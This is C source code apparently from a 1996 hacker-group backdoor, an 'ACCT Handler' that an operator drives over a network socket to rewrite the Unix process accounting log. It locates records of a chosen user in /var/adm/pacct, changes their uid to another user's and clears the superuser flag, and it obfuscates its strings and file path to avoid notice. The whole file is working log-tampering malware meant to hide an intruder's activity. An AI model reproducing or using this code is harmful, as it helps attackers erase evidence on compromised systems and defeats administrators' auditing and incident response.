#ifdef ACCTH

/* #### ACCT Handler v1.0 beta #### 
   #### By Zhart/THC  (c) 1996 #### */

#undef LINUX

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/file.h> 
#include <unistd.h> 
#ifdef LINUX
#include <linux/acct.h>
#else 
#include <sys/acct.h>
#endif
#include <time.h>
#include <pwd.h>
#include <strings.h> 
#include <signal.h>
#include <fcntl.h>
#include "strhide.h"

#define STEPS  500   /* Number of steps to go back in fast search */

int u_uid=0;         /* Default uid of user to hide */
int f_uid=3;         /* Default uid of user to show */
char p_name[16];     /* Program to assign to fake_user */ 
int b_flag=0;           /* Beginning (no date) flag */
int m_flag=0;           /* CountDown Mask Mode flag */
char filename[30];      /* acct logging file */

/* for Smeagol */
int     transfer_socket;
FILE    *sfd;
int     n;
char    buf[4096];
#define w2s(str) write(transfer_socket, str, strlen(str))
#define reads(str) \
{ \
  n = read(transfer_socket, str, sizeof(str));  \
  if(str[n-1] == '\n') \
    str[n-2] = 0; \
}    
          

int vUsr(char *name)
/* verifyUser - returns the uid of a user's login name */
{
struct passwd *pwt;

if((pwt = getpwnam(name)) != NULL)
  return(pwt->pw_uid);
else {
  sprintf (buf, SHD(">%\",C/B-K<70B<3@B<3\\^)7$P<2<P/3@U<20B-\"-;"),name);
  w2s(buf);
  return(1);
  }
}

void readDate (long *i)
/* Reads date and returns it in UTC (seconds) */
/* Interactive mode */
{
struct tm t;
w2s("Please type time,day,month,year  Ex: 13:15 27/10/83\n --> "); 
fscanf(sfd,"%d:%d %d/%d/%d",
&(t.tm_hour),&(t.tm_min),
&(t.tm_mday),&(t.tm_mon),&(t.tm_year));
t.tm_sec=0;
(t.tm_mon)--;
t.tm_wday=6;
t.tm_yday=0;
t.tm_isdst=0;

*i=mktime(&t); 
sprintf (buf,"Input time has been interpreted as: %.24s\n",ctime(i));
w2s(buf);
}

void rUsrs()
/* readUsers - Interactive mode */
{
char u_name[16];
char f_name[16];

w2s("\nName of user to hide:\n --> ");
reads(u_name)
u_uid=vUsr(u_name);

w2s("\nName of user to show:\n --> ");
reads(f_name)
f_uid=vUsr(f_name);
}

void Interactive(long *u_date)
{
char answer[16];

startEnd();

w2s("Start from beginning? [y/N]: ");
reads(buf);
if (buf[0] == 'y') b_flag=1;
  else readDate(u_date);
rUsrs();
/* readProg */

w2s("\nSpecify command? [y/N]: ");
reads(buf);
if (buf[0] == 'y') {
  w2s(" ==> ");
  reads(answer)
  strcpy(p_name,answer);
  }
}


int startEnd()
/* Prints dates of first and last log */
{
struct acct actbuf;
int fd;
long endtime;

w2s("\n");
w2s(SHD("T<G)R<G)R<G)Q<7$0$A(%<1DP/S4]-\"-Q,RAQ\"SDP(R5Q>3)X<6!H:&=Q<7%R<G)R<G)R<@``"));
w2s("\n");

/* Open acct file in read-only mode*/
if((fd = open(filename,O_RDONLY)) == -1 )
  return(-1);

/* read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }

endtime=actbuf.ac_btime+actbuf.ac_etime;
sprintf(buf,"\nFile starts at:  %.24s\n",ctime(&endtime));
w2s(buf);

/* GotoENd */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
      (void)close(fd);
      return(0);
      }

/* Read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }

endtime=actbuf.ac_btime+actbuf.ac_etime;
sprintf(buf,"File ends at:    %.24s\n\n",ctime(&endtime));
w2s(buf);
(void)close(fd);
}


int reachFast (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;

/* Set offset to end of file */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
      (void)close(fd);
      return(0);
      }

while (!found) {

  /* Read the buffer */
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }
  /* Verify date */
  endtime=actbuf.ac_btime+actbuf.ac_etime;
  if (endtime < u_date) found=1;
  else 
    /* Go down of STEPS lines <------ */
    if(lseek(fd,(long)(-(STEPS*sizeof(actbuf))),SEEK_CUR) < 0) {
      (void)close(fd);
      return(0);
      }
  }
sprintf(buf,"Date reached (fast): %.24s\n",ctime(&endtime));
w2s(buf);
}

int reachSlow (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;

while (!found) {

  /* Read the buffer */
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }
  /* Verify date */
  endtime=actbuf.ac_btime+actbuf.ac_etime;
  if (u_date<=endtime) found=1;
  }
sprintf(buf,"Date reached (slow): %.24s\n",ctime(&endtime));
w2s(buf);
}


int verifyA (struct acct actbuf)
/* verifyAct - Verifies if acct record must be edited */
{
/* return(actbuf.ac_uid==u_uid); */
if (actbuf.ac_uid==u_uid) 
  if (p_name[0]=='\0') return(1);
  else if (!strcmp(p_name,actbuf.ac_comm)) return (1);
return(0);
} 


int editA(int fd,struct acct actbuf)
/* editAct - */
{
w2s("#");
fflush(stdout);
actbuf.ac_uid = f_uid;
actbuf.ac_flag &= ~ASU;
if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
  (void)close(fd);
  return(0);
  }
if(write(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
  (void)close(fd);
  return(0);
  }
}


int scanA (int fd)
/* scanACCT - */
{
struct acct actbuf;

w2s("Scanning data ...\n");

while (1) { 
  /* read buffer*/
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
      (void)close(fd);
      return(0);
      }
  /* verify criteria matching and (eventually) start editing */
  if (verifyA(actbuf)) editA(fd,actbuf);
  } 
}



int accthndlr(void)
{
long u_date;
int fd;

filename[0]='/';
filename[1]='v';
filename[2]='a';
filename[3]='r';
filename[4]='/';
filename[5]='a';
filename[6]='d';
filename[7]='m';
filename[8]='/';
filename[9]='p';
filename[10]='a';
filename[11]='c';
filename[12]='c';
filename[13]='t';
filename[14]='\0';

if((sfd = fdopen(transfer_socket, "r")) == NULL)
  return(-1);

Interactive(&u_date);

/* Should insert a date validation */

sprintf(buf,"\n%s %d %s %d\n", SHD("/&3@U.#\\V<20B-\"-Q.#5K"), u_uid, SHD("0`CD^)C@_-G$D(C0C<3@U:P``"), f_uid);
w2s(buf);

/* Open ACCT file in read/write mode */ 
if((fd = open(filename,O_RDWR)) == -1 )
  return(-1);
if (!b_flag) { 
  reachFast(fd,u_date);
  reachSlow(fd,u_date);
  }
scanA(fd);
(void)close(fd);
w2s("\n");
}

#endif
